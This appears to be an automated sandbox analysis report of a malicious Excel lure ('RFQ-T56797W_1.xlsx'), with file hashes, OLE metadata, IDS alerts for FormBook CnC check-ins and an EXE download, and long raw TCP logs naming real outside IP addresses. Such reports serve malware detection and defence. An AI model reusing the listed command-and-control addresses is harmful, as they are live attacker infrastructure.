                                SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                MD5:797869BB881CFBCDAC2064F92B26E46F
                                SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                Malicious:false
                                Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                File type:Microsoft Excel 2007+
                                Entropy (8bit):7.998661776240753
                                TrID:
                                • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                • ZIP compressed archive (8000/1) 16.67%
                                File name:RFQ-T56797W_1.xlsx
                                File size:1'228'030 bytes
                                MD5:138d7d8a55bef05ac6368488b3c9630d
                                SHA1:f9e93ed382d3005a7575443369207f2c3339309b
                                SHA256:25e7a5ff8ca830bccda9a6617b31fb3992d4f780444cf3adc8cfb8056f26dd58
                                SHA512:5ad15b60f1e97b83ccd32b4bb06716552e429d4bec0cee78efa99a545ee05d4abbc6f7c896f7ce079431d90e6758aa4cb68a98672511e9f360a8509d1bf621f6
                                SSDEEP:12288:YWdBCwo3NVvUP/hkRQFTvW7HKReRSR0H8CK/+d5NUzsChpgUWxt7HCZoUPYG0hmL:YgtI/u/httvKaey0cgzobrhPEm+RlDS
                                TLSH:0D4533A1D3AD958F6BA4C06426E45AC6212FFD9C95A339BD12B0E8C758093C7DF3F160
                                File Content Preview:PK........@*mW...g....g.......[Content_Types].xmlUT.....Qe..Qe..Qe.UKK.1.....%W..U...">..TP.k.L..l.3cm....U..XZ...%...M...Y..)$..W.WvE.^.c.....W.#Q )o...*1...'.;..y.,....c.x,%.1.......0.Z.....JO...~.{(u...:.9.I...$k..S.nT.:r.$1.,....Dq..f.J........z.C...C
                                Icon Hash:2562ab89a7b7bfbf
                                Document Type:OpenXML
                                Number of OLE Files:1
                                Has Summary Info:
                                Application Name:
                                Encrypted Document:False
                                Contains Word Document Stream:False
                                Contains Workbook/Book Stream:True
                                Contains PowerPoint Document Stream:False
                                Contains Visio Document Stream:False
                                Contains ObjectPool Stream:False
                                Flash Objects Count:0
                                Contains VBA Macros:False
                                Author:ctrl
                                Last Saved By:ctrl
                                Create Time:2022-11-18T02:05:27Z
                                Last Saved Time:2022-11-18T02:07:12Z
                                Creating Application:Microsoft Excel
                                Security:0
                                Thumbnail Scaling Desired:false
                                Contains Dirty Links:false
                                Shared Document:false
                                Changed Hyperlinks:false
                                Application Version:12.0000
                                General
                                Stream Path:\x1oLE10NAtIvE
                                CLSID:
                                File Type:data
                                Stream Size:1462179
                                Entropy:7.225828857618607
                                Base64 Encoded:True
                                Data ASCII:< . . . . a ' j & . . 6 . O . ( R . ? - U . . . p S D . . . j ) . Y i i X f { > . b $ . V m O . . . I P z C X 7 . > } o w . z . p . * . t . * . e Z . . P . t z . . L I . r . . A h { ] J B # @ ^ 2 . @ : l } " E c { . . . l . Q . . G h . K y W < 0 W . k ` c 6 . Q - W 4 A . . . H . A 9 d . . . . E r . . Y O r . 8 O n 9 I . < d . . } , h . i [ . = . . $ a ) # o = 3 ) . x ? 5 + ~ % y ` { i | z . . O & z & . T c . 0 @ . } . " & f E G . . . $ . < . . . . . ' 7 w . 8 . . V & _ . Z : 9 ! u } 0 J E k t _ . % "
                                Data Raw:88 cb 3c 04 02 fc f7 98 f4 fd 01 08 61 27 be 6a f9 26 fb 81 c6 d2 c3 1e 05 8b 36 8b 16 b8 4f 98 b9 ff f7 d0 8b 28 52 ff d5 05 3f ce f4 f7 2d 55 1c ed f7 ff e0 03 c6 af 70 fb 9b 53 44 00 13 ce 0c 6a 8c 29 85 d9 ba e5 b4 df 59 69 69 c3 58 66 7b e1 3e f6 df 9f 62 24 18 56 f0 6d a9 d7 eb e2 4f 10 1d d0 1a 96 99 f5 49 b4 f7 50 dc 7a 43 8a 58 37 9e 02 20 3e 7d 6f 77 d2 ab c0 7a 1e 70 82
                                General
                                Stream Path:WfMtcrVR
                                CLSID:
                                File Type:empty
                                Stream Size:0
                                Entropy:0.0
                                Base64 Encoded:False
                                Data ASCII:
                                Data Raw:
Timestamp                 Protocol  SID      Message                                                              Source Port  Dest Port  Source IP     Dest IP
11/14/23-13:28:23.777818  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)                                 49167        80         192.168.2.22  38.11.36.68
11/14/23-13:28:02.320328  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)                                 49166        80         192.168.2.22  91.195.240.19
11/14/23-13:27:01.556896  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)                                 49164        80         192.168.2.22  103.224.212.212
11/14/23-13:28:45.165462  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)                                 49168        80         192.168.2.22  3.33.130.190
11/14/23-13:29:05.883659  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)                                 49169        80         192.168.2.22  34.149.87.45
11/14/23-13:26:24.263209  TCP       2021697  ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious  49162        80         192.168.2.22  41.185.64.155
Timestamp                          Source Port  Dest Port  Source IP      Dest IP
                                Nov 14, 2023 13:26:26.413392067 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.413403034 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.413642883 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.413692951 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.413803101 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.413819075 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.413832903 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.413845062 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.413851976 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.413858891 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.413870096 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.413886070 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.413897991 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.413897991 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.413924932 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.414151907 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.414215088 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.414215088 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.414247036 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.414262056 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.414273977 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.414287090 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.414299965 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.414309978 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.414310932 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.414320946 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.414326906 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.414340019 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.414344072 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.414354086 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.414372921 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.414397955 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.414412022 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.414412975 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.414427996 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.414441109 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.414446115 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.414453983 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.414454937 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.414475918 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.414482117 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.414484024 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.414505005 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.414520025 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.414635897 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.834266901 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.834323883 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.834336042 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.834343910 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.834537983 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.834861040 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.834923029 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.834935904 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.834942102 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.834952116 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.834966898 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.834986925 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.835005045 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.835005999 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.835058928 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.835072994 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.835086107 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.835100889 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.835114956 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.835134029 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.835144043 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.835210085 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.835222960 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.835242033 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.835257053 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.835262060 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.835270882 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.835282087 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.835309029 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.835412979 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.835427046 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.835443020 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.835454941 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.835462093 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.835488081 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.835488081 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.835748911 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.835800886 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.835820913 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.835834980 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.835846901 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.835859060 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.835860968 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.835877895 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.835891008 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.835906029 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.835984945 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.835999012 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.836011887 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.836024046 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.836028099 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.836040020 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.836051941 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.836070061 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.836211920 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.836253881 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.836258888 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.836297035 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.836297989 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.836313009 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.836338043 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.836354017 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.836524963 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.836568117 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.836580038 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.836618900 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.836620092 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.836633921 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.836658955 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.836673021 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.836849928 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.836872101 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.836890936 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.836941957 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.836955070 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.836968899 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.836982012 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.836996078 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.837008953 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.837174892 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.837188005 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.837202072 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.837214947 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.837215900 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.837233067 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.837255955 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.837312937 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.837327957 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.837353945 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.837369919 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.837388992 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.837403059 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.837414980 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.837435007 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.837435007 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.837456942 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.837706089 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.837740898 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.837750912 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.837754011 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.837769032 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.837779045 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.837804079 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.837956905 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.837970018 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.837981939 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.837994099 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.837999105 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.838016033 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.838033915 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.838293076 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.838325024 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.838339090 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.838340044 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.838352919 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.838363886 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.838378906 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.838393927 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.838435888 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.838450909 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.838463068 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.838475943 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.838476896 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.838491917 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.838506937 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.838519096 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.838540077 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.838582993 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.838603020 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.838617086 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.838644028 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.838651896 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.838661909 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.838685989 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.838937044 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.838982105 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.839014053 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.839026928 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.839039087 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.839051962 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.839061975 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.839083910 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.839287043 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.839329958 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.839351892 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.839365005 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.839379072 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.839399099 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.839420080 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.839935064 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.839966059 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.839983940 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.839999914 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.840008974 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.840024948 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.840043068 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.840290070 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.840303898 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.840315104 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.840327978 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.840338945 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.840342999 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.840353966 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.840358973 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.840372086 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.840378046 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.840387106 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.840406895 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.840410948 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.840423107 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.840425968 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.840451956 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.840465069 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.840470076 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.840490103 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.840919018 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.840919018 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.841216087 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.841231108 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.841250896 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.841265917 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.841276884 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.841288090 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.841290951 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.841305971 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.841312885 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.841319084 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.841330051 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.841334105 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.841348886 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.841350079 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.841361046 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.841377974 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.841391087 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.841918945 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.841933012 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.841945887 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.841958046 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.841959953 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.841979027 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.841990948 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.842004061 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.842029095 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.842066050 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.842094898 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.842108011 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.842119932 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.842134953 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.842159033 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.842437983 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.842459917 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.842473984 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.842485905 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.842492104 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.842514992 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.842521906 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.842556953 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.842685938 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.842720032 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.842750072 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.842762947 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.842776060 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.842787027 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.842806101 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.842818022 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.842936039 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.842950106 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.842962980 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.842972994 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.842978001 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.842987061 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.842993975 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.843005896 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.843020916 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.843035936 CET4916280192.168.2.2241.185.64.155
Nov 14, 2023 13:26:26.843868017 CET | 49162 | 80 | 192.168.2.22 | 41.185.64.155
Nov 14, 2023 13:26:26.851995945 CET | 49162 | 80 | 192.168.2.22 | 41.185.64.155
Nov 14, 2023 13:26:28.725647926 CET | 49162 | 80 | 192.168.2.22 | 41.185.64.155
Nov 14, 2023 13:27:01.368810892 CET | 49164 | 80 | 192.168.2.22 | 103.224.212.212
Nov 14, 2023 13:27:01.556674004 CET | 80 | 49164 | 103.224.212.212 | 192.168.2.22
Nov 14, 2023 13:27:01.556788921 CET | 49164 | 80 | 192.168.2.22 | 103.224.212.212
Nov 14, 2023 13:27:01.556895971 CET | 49164 | 80 | 192.168.2.22 | 103.224.212.212
Nov 14, 2023 13:27:01.751121998 CET | 80 | 49164 | 103.224.212.212 | 192.168.2.22
Nov 14, 2023 13:27:01.751142979 CET | 80 | 49164 | 103.224.212.212 | 192.168.2.22
Nov 14, 2023 13:27:01.751332045 CET | 49164 | 80 | 192.168.2.22 | 103.224.212.212
Nov 14, 2023 13:27:01.751410961 CET | 49164 | 80 | 192.168.2.22 | 103.224.212.212
Nov 14, 2023 13:27:01.937576056 CET | 80 | 49164 | 103.224.212.212 | 192.168.2.22
Nov 14, 2023 13:28:02.013607979 CET | 49166 | 80 | 192.168.2.22 | 91.195.240.19
